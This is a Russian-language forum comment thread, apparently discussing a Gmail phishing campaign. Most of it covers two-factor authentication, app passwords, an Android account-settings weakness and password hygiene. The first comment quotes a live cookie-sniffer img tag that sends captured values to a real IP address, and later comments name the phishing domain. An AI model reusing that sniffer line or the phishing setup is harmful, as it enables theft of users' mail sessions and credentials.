Как воруют вашу почту: gmail fishing

[LukaSafonov]

Там слева недавно отправленные — фишинг открытка майлру висит со сниффером.

ВНИМАНИЕ! РАБОЧИЙ СНИФФЕР!!! Посещайте на свой страх и риск!!!

img src="//91.196.216.115/~play8189/n/kan/s.gif?+%value%" width="1" height="1"

[xdemon]

Сниффер от kanick? Очуметь, до сих пор им пользуются.

[AnViar]

Двухфакторная авторизация же…

[Alukardd]

Ну да, как раз — для себя и для того парня.

[or10n]

если я не ошибаюсь, то повторная авторизация с одним и тем-же кодом подтверждения невозможна

[Nigrimmist]

Возможна. Я не знаю какие у гугла алгоритмы определения уникальности, но если авторизуешься с другого компьютера/браузера то просит ввести код.

[soomrack]

А некоторым и воровать не надо (выдержка из пользовательского соглашения, на которое есть ссылка и при регистрации аккаунта в gmail.com):

Ваше содержание в Службах

Некоторые наши Службы позволяют распространять содержание. При этом все права на интеллектуальную собственность в отношении этих материалов остаются у их владельца. Проще говоря, все, что было вашим, таковым и останется.

Загружая или иным образом добавляя материалы в наши Службы, вы предоставляете компании Google и ее партнерам действующую во всем мире лицензию, которая позволяет нам использовать это содержание, размещать его, хранить, воспроизводить, изменять, создавать на его основе производные работы (например, переводы, адаптации и прочие способы оптимизации материалов), обмениваться им, публиковать его, открыто воспроизводить, отображать, а также распространять. Перечисленные права, которые вы предоставляете нам, используются исключительно для обеспечения работы существующих Служб, их продвижения и совершенствования, а также для разработки новых. Указанная лицензия будет действовать и после того, как вы откажетесь от использования Служб (например, мы будем по-прежнему использовать данные о компании, добавленные вами на Карты Google). В некоторых Службах разрешается просматривать и удалять добавленное в них содержание. В некоторых из них также действуют условия и настройки, которые накладывают ограничение на использование нами таких материалов. Прежде чем отправлять нам содержание и тем самым предоставлять лицензию на его использование, убедитесь, что у вас есть на это соответствующие права.

Подробная информация о том, как Google применяет и хранит содержание, приведена в политике конфиденциальности и в дополнительных условиях использования соответствующих Служб. Если вы отправляете нам отзывы и предложения относительно работы со Службами, мы оставляем за собой право реализовывать их, не возлагая на себя никаких обязательств перед их автором.

[anmipo]

Настораживает ещё и противоречивая фраза:

To disallow ...@gmail.com to automatically forward mail to your address, please click the link below to confirm the request

«Чтобы запретить, кликните, чтобы подтвердить»

[crosser]

Я включил приход смс от гугла, если открывают gmail с другого компьютера. google account->security

[GrayWind]

Возможно, имеется в виду двухшаговая авторизация. Если её включить, то приходит смс с кодом. Если пришёл код, но вы при этом не заходили в гугл, значит… Ну, вы поняли.

[crosser]

support.google.com/a/bin/answer.py?hl=en&answer=175197

[crosser]

да есть бага интересная с этой авторизацией. Когда ее включил, тестовые смс не приходили, раз 5 пробовал. Пришлось включить голосовой звонок с кодом. Возможно это связано с моим оператором в Таиланде

[netwatcher]

в России без проблем срабатывает, при вводе пароля уведомление появляется, что мол щас Вам смс придёт, ждите, и окошко с вводом кода из смс.
Смска приходит на удивление очень быстро :)
вводим код, логинимся в почту

З.Ы. не прокатит залогиницца на Андройдных девайсах, сразу же ошибка авторизации и всё
для телефона пришлось доп. аккаунт делать

[KaiSD]

Для андроидных девайсов, инстант мессенджеров и другого софта там есть генерация дополнительных паролей (пароли приложений).
Хотя это несколько снижает безопасность системы…

[shogunkub]

Ничего это не снижает. При помощи пароля приложения нельзя изменить настройки аккаунта, нужен основной пароль+код из СМС. А отключить скомпрометированный пароль приложения можно в пару кликов.

[KaiSD]

Было бы хорошо если бы все было именно так как описано, но к сожалению, это утверждение не соответствует действительности.

Я только что зашел на панель управления аккаунтом с андроида, на котором ни разу не вводил основной пароль от гугля. Функция андроида «залогиниться текущим аккаунтом» отлично срабатывает при повторном запросе пароля.

[shogunkub]

Можно подробнее, как вы это сделали? Только что попробовал — не получилось.

[KaiSD]

Захожу браузером в телефоне на страницу со своим гуглопрофилем.
Появляется форма ввода пароля. Одновременно вверху экрана появляется предложение от андроида «войти как» со списком подключенных аккаунтов.

Нажимаю «войти», и попадаю на страницу управления профилем без ввода настоящего пароля.

[shogunkub]

У вас ICS? У меня на 2.3 в телефоне такого нет, а на 4.0.3 в планшете такая же ерунда. Видимо в гугле пожертвовали безопасностью в угоду удобству…

[KaiSD]

ICS и на телефоне, и на планшете.

[shogunkub]

Значит точно дырка родом из ICS. Радовался двухфакторной аутентификации, а теперь вот озадачен…

[shogunkub]

Единственное, что радует — для смены пароля всё-таки нужен старый или ответ на контрольный вопрос. Но дырка всё равно существенная.

[taliban]

В таких ситуациях запоминание логина и пароля спасает хомячков, меня бы в первую очередь насторожило что поля логина и пароля не подсвечиваются браузером, значит он их здесь не запоминал, а значит палево.

[Monyag]

Объясни это моей маме, хорошо?

[petropavel]

Легко. «Вот тебе, мама, 20-значный пароль на почту. Не волнуйся, что ты не можешь его запомнить, это и не надо — браузер сам подставит его когда нужно будет».

И все — никуда мама пароль не введет, она его банально не знает

[coolmiha]

Можно подробнее о деталях атаки?
По ссылке check-googlemail.com перекидывает на google.com

[LukaSafonov]

Заведите левый аккаунт гугла и перейдите по ссылке. Вас редиректит в ваш _уже_залогиненный_ящик_. А похоже, как будто вы авторизовались и вошли. Тут атаки нет как таковой, без действия пользователя ничего не получится, это социнжиниринг + фишинг.

[binba]

chrome тоже блокирует

[LukaSafonov]

Это не всегда поможет, вот вам свежий пример:

В мобильном браузере Safari найдена уязвимость, позволяющая сайту-злоумышленнику отображать неверный URL-адрес и тем самым вводить пользователя в заблуждение, ставя под угрозу защиту пользовательских данных.

[Tesby]

А если не использовать веб-интерфейсы для почты, сам лично крайне редко ими пользуюсь, предпочитаю SimpleMail для Fx.

[deniamnet]

ServiceLogin.php — лолшто?

[FlyingHigh]

Пароль от Google нужно хранить как зеницу ока. Ведь помимо Gmail у пользователей по умолчанию включено автосохранение паролей — а при включённой синхронизации для аккаунта Google, все эти пароли хранятся на стороне Google. Поэтому злоумышленнику, в случае попадания в его руки всего одного пароля, сможет быть доступен весь пул интернет-активности пользователя.

[shogunkub]

Двухфакторная аутентификация — наше всё.

[Grammarnazi]

Ещё одна причина использовать разные пароли для разных сервисов и держать их все если не в голове, то на личной машинке. Google такой услуги (свой пароль на каждый сервис) не предоставляет, к сожалению, из-за чего в своё время пришлось отказаться от его использования.

[foxmuldercp]

Есть дополнительные пароли на приложения. кое где прямо говорят — вводи доп-пароль, а не пароль от аккаунта, а кое-где наоборот.
Но не помню, чтобы можно было настроить, чтобы с паролем «васяпупкин» ходить только с телефона, «васядурак» с пикасы на пк.

[ComodoHacker]

Не увидел «серьезной реализации».
Но за предупреждение спасибо.

[startupper]

Правило №1: нельзя ходить в интернет!

[mamap]

я единственный, кто не читает длинные письма на не русском от левых отправителей и сразу кидает их в спам/корзину?

[foxmuldercp]

я читаю — мне интересно :)

[Levsha]

Домен добавлен в базу фишинга SkyDNS, спс за наводку